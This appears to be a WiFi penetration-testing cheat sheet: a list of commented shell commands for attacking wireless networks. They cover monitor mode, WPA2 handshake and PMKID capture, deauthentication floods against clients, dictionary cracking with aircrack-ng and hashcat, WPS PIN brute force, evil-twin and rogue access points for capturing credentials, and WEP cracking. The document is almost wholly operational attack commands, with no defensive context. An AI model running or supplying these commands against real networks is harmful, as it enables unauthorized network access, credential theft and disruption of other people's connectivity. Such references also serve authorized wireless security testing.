WiFi Hacking¶

# Check interface name
iwconfig

# Enable monitor mode
airmon-ng start wlan0

# Kill interfering processes first
airmon-ng check kill
airmon-ng start wlan0

# Disable monitor mode
airmon-ng stop wlan0mon

# Scan for nearby networks
airodump-ng wlan0mon

# Target a specific network and capture handshakes
airodump-ng -c <channel> --bssid <AP_MAC> -w capture wlan0mon

# Deauth a client to force handshake (run alongside airodump-ng)
aireplay-ng --deauth 10 -a <AP_MAC> -c <CLIENT_MAC> wlan0mon

# Deauth all clients on AP
aireplay-ng --deauth 0 -a <AP_MAC> wlan0mon

# Aircrack-ng — dictionary attack
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture.cap

# Hashcat — convert cap to hc22000 first
hcxpcapngtool -o capture.hc22000 capture.cap

# Crack with hashcat (WPA2)
hashcat -m 22000 capture.hc22000 /usr/share/wordlists/rockyou.txt

# Dictionary + rules
hashcat -m 22000 capture.hc22000 /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule

# Capture PMKID
hcxdumptool -i wlan0mon -o capture.pcapng --enable_status=1

# Convert and crack
hcxpcapngtool -o capture.hc22000 capture.pcapng
hashcat -m 22000 capture.hc22000 /usr/share/wordlists/rockyou.txt

# Scan for WPS-enabled APs
wash -i wlan0mon

# Reaver — WPS PIN brute force
reaver -i wlan0mon -b <AP_MAC> -vv

# Bully — alternative WPS brute force
bully wlan0mon -b <AP_MAC> -d -v 3

# Create a rogue AP with hostapd-wpe (WPA Enterprise credential capture)
hostapd-wpe hostapd-wpe.conf

# Lightweight rogue AP with hostapd
hostapd hostapd.conf

# Full evil twin with captive portal
airbase-ng -e "<SSID>" -c <channel> wlan0mon

# Capture IVs
airodump-ng -c <channel> --bssid <AP_MAC> -w wep_capture wlan0mon

# ARP replay to generate traffic
aireplay-ng -3 -b <AP_MAC> -h <CLIENT_MAC> wlan0mon

# Crack once enough IVs collected (~50k+)
aircrack-ng wep_capture.cap